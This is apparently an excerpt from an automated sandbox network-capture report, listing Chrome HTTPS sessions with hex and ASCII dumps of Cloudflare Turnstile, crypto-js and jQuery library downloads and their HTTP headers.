                                                            2025-01-06 15:53:48 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                            Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                            Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                            Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                            Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                            Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.449760104.17.25.144433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:48 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                            Host: cdnjs.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:48 UTC959INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:48 GMT
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            Cache-Control: public, max-age=30672000
                                                            ETag: W/"61182885-40eb"
                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                            cf-cdnjs-via: cfworker/kv
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Timing-Allow-Origin: *
                                                            X-Content-Type-Options: nosniff
                                                            CF-Cache-Status: HIT
                                                            Age: 1044576
                                                            Expires: Sat, 27 Dec 2025 15:53:48 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=21oC76nreyUkTzAWFt9yfW5f%2BlBmfjfB8MREGoABHftsQtr60hxuIc9iKKBKkA5EDY58RifhfkaQEbNuxlRKxcabCDA1OmDdGfOK%2FqveEg2z7D%2F4T2BZQdxEnRUZu37Vopftobfk"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                            Strict-Transport-Security: max-age=15780000
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce20e780242f8-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:48 UTC410INData Raw: 37 62 66 32 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                            Data Ascii: 7bf2!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65
                                                            Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                            Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63
                                                            Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e
                                                            Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                            Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                            Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                            Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                            Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                            2025-01-06 15:53:48 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                            Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.449761151.101.66.1374433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:48 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                            Host: code.jquery.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
